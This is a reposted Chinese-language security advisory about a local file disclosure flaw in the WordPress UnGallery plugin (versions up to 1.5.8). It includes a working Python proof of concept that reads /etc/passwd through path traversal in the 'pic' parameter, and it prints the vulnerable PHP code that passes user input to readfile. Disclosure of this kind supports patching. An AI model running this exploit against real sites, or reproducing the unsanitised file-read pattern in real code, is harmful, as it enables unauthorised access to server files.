网站地图    收藏   

主页 > 后端 > 网站安全 >

WordPress插件UnGallery <= 1.5.8本地文件泄露缺陷及

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: WordPress UnGallery plugin = 1.5.8 Local File Disclosure Vulnerability作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)下载地址: http://downloads.wordpress.org/......

标题: WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
下载地址: http://downloads.wordpress.org/plugin/ungallery.1.5.8.zip
已测试版本: 1.5.8
 
---
测试方法
---
#!/bin/python
 
import urllib2
 
FILEPATH = "/etc/passwd"
 
req = urllib2.urlopen("http://www.2cto.com /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../..%s" % FILEPATH)
 
print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())
 
---------------
Vulnerable code
---------------
if ($_GET['pic']) {
    $filename = $_GET['pic'];
    $len = filesize($filename);
    $lastslash =  strrpos($filename, "/");
    $name =  substr($filename, $lastslash + 1); 
 
    header("Content-type: image/jpeg;\r\n");
    header("Content-Length: $len;\r\n");
    header("Content-Transfer-Encoding: binary;\r\n");
    header('Content-Disposition: inline; filename="'.$name.'"');    //  Render the photo inline.
    readfile($filename);
}
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论